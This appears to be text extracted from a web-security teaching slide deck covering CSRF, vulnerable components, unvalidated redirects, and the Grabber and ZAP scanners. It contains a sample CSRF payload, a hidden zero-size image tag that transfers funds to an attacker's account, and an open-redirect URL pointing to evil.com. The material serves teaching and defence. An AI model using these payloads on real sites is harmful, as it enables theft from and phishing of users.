  • 34. EXAMPLE The application allows a user to submit a state changing request that does not include anything secret. For example: http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control: <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
  • 35. Using Components with Known Vulnerabilities
  • 36. Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
  • 39. Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
  • 40. EXAMPLES Scenario #1: The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware. http://www.example.com/redirect.jsp?url=evil.com
  • 41. Open Web App Security tools
  • 42. GRABBER Grabber is a web application scanner. Basically it detects some kind of vulnerabilities in your website. Grabber is simple, not fast but portable and really adaptable. This software is designed to scan small websites such as personals, forums etc. absolutely not big application: it would take too long time and flood your network.
  • 43. It can detect the following vulnerabilities: ➔ Cross site scripting ➔ SQL injection ➔ File inclusion ➔ JS source code analyzer ➔ Backup file check
  • 45. It can detect the following vulnerabilities ➔ Cross Site Scripting (XSS) ➔ SQL Injection ➔ Directory Traversal ➔ URL Injection ➔ Error Detection ➔ File Uploads ➔ Sensitive Data Discovery
  • 47. ZAP Features ➔Open source Cross platform ➔Easy to install (just requires java 1.7) ➔Completely free (no paid for 'Pro' version) ➔Ease of use a priority ➔Comprehensive help pages ➔Fully internationalized Translated into a dozen languages ➔Community based, with involvement actively encouraged ➔Under active development by an international team of volunteers
  • 48. ZAP Functionality ➔Intercepting Proxy ➔Traditional and AJAX spiders ➔Automated scanner ➔Passive scanner ➔Forced browsing ➔Fuzzer ➔Dynamic SSL certificates ➔Smartcard and Client Digital Certificates support
  • 49. ➔Authentication and session support ➔Powerful REST based API ➔Automatic updating option ➔Integrated and growing marketplace of add-ons
  • 50.